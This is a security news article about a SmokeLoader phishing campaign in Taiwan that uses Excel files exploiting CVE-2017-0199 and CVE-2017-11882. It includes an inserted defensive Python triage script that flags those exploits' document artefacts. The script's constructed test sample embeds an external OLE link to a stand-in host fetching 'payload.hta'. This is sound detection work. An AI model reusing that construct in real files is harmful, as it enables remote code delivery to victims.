Malicious Excel file delivered in phishing campaign.
Healthcare, manufacturing, and IT organizations across Taiwan have been subjected to SmokeLoader malware intrusions as part of a new campaign.
According to research from Fortinet FortiGuard Labs, in a report shared with The Hacker News, the attacks began with phishing emails carrying a malicious Microsoft Excel file that exploits CVE-2017-0199 and CVE-2017-11882 to deliver Ande Loader. Both are long-patched 2017 Office vulnerabilities (an OLE object link handling flaw and an Equation Editor memory corruption bug, respectively), so the campaign relies on endpoints that have not received those updates.
Ande Loader then deploys SmokeLoader, which comprises a stager that decrypts and loads the primary module, a primary module that establishes persistence, and an extensive set of plugins that exfiltrate various data types, including email addresses, FTP credentials and Outlook data.
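A defender triaging a lure like the one described above wants a quick check for the document artefacts these two exploits leave behind: a CVE-2017-0199 document carries an OLE relationship whose target is resolved externally, and a CVE-2017-11882 document embeds an Equation Editor 3.0 object (ProgID Equation.3, CLSID {0002CE02-0000-0000-C000-000000000046}, stream name "Equation Native"). The following script is an added example and is not Fortinet's or SC Media's code; it inspects the ZIP container of an .xlsx/.docx for those indicators and flags them without executing anything. The two sample documents it scans are constructed in memory (the embedded object is only a CFB header plus a directory fragment, not a real OLE file, and the 203.0.113.10 URL is a test address).

```python
"""Triage check for the CVE-2017-0199 and CVE-2017-11882 document artefacts.

Added example, not code from Fortinet or the article. It flags indicators in an
OOXML container; it does not exploit anything. Samples below are constructed.
"""
import io
import re
import zipfile

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} as stored in
# an OLE2/CFB directory entry: first three fields little-endian, rest as-is.
EQNEDT_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000" "000000000046")
# Stream name Equation Editor writes into the embedded object (UTF-16LE in CFB).
EQNEDT_STREAM = "Equation Native".encode("utf-16-le")
# OLE2 compound file magic, so only real embedded objects are inspected.
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Relationship type for OLE objects; with TargetMode="External" it is the
# construct CVE-2017-0199 samples use to fetch a remote HTA or payload.
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
REL_RE = re.compile(r"<Relationship\b[^>]*>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def scan_office_document(data: bytes) -> list:
    """Return (indicator, part name, detail) tuples for a ZIP-based Office file."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            lower = name.lower()
            if lower.endswith(".rels"):
                for m in REL_RE.finditer(blob.decode("utf-8", "replace")):
                    attrs = dict(ATTR_RE.findall(m.group(0)))
                    if (attrs.get("Type") == OLE_REL_TYPE
                            and attrs.get("TargetMode", "").lower() == "external"):
                        findings.append(("external-ole-link (CVE-2017-0199 pattern)",
                                         name, attrs.get("Target", "")))
            elif lower.endswith(".xml"):
                # Word writes ProgID="Equation.3", Excel writes progId="Equation.3".
                if re.search(r'progId="Equation\.3"', blob.decode("utf-8", "replace"), re.I):
                    findings.append(("equation-editor-progid (CVE-2017-11882 pattern)",
                                     name, "Equation.3"))
            elif lower.endswith(".bin") and blob[:8] == CFB_MAGIC:
                if EQNEDT_CLSID in blob or EQNEDT_STREAM in blob:
                    findings.append(("equation-editor-object (CVE-2017-11882 pattern)",
                                     name, "CLSID or 'Equation Native' stream present"))
    return findings


def build_sample(malicious: bool) -> bytes:
    """Construct a minimal .xlsx-like ZIP; the malicious variant carries both indicators."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        if malicious:
            zf.writestr("xl/worksheets/sheet1.xml",
                        '<worksheet><oleObjects><oleObject progId="Equation.3" '
                        'r:id="rId1"/></oleObjects></worksheet>')
            zf.writestr("xl/worksheets/_rels/sheet1.xml.rels",
                        '<Relationships><Relationship Id="rId1" Type="%s" '
                        'Target="http://203.0.113.10/payload.hta" TargetMode="External"/>'
                        '</Relationships>' % OLE_REL_TYPE)
            # Constructed stand-in for an embedded OLE object: CFB magic, padding,
            # then a directory fragment with the stream name and CLSID.
            zf.writestr("xl/embeddings/oleObject1.bin",
                        CFB_MAGIC + b"\x00" * 504 + EQNEDT_STREAM + b"\x00" * 32 + EQNEDT_CLSID)
        else:
            zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
            zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", "<Relationships/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("benign", build_sample(False)), ("suspicious", build_sample(True))):
        print(label, scan_office_document(doc))
```

On a real sample, pass the file's bytes to scan_office_document; for deeper inspection of the embedded object (parsing the CFB directory rather than substring matching) a library such as olefile or oletools is the usual next step. Legacy .xls binaries are not ZIP containers and need the same CLSID and stream checks applied to the OLE2 file directly.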
SmokeLoader is a malware downloader first advertised in cybercrime forums in 2011, and is chiefly designed to execute secondary payloads. Additionally, it possesses the capability to download more modules that augment its own functionality to steal data, launch distributed denial-of-service (DDoS) attacks, and mine cryptocurrency.
Written by
Dan Raywood
Senior Editor
SC Media UK
Dan Raywood is a B2B journalist with more than 20 years of experience, including covering cybersecurity for the past 16 years. He has extensively covered topics from Advanced Persistent Threats and nation-state hackers to major data breaches and regulatory changes.
He has spoken at events including 44CON, Infosecurity Europe, RANT Conference, BSides Scotland, Steelcon and ESET Security Days.
Outside work, Dan enjoys supporting Tottenham Hotspur, managing mischievous cats, and sampling craft beers.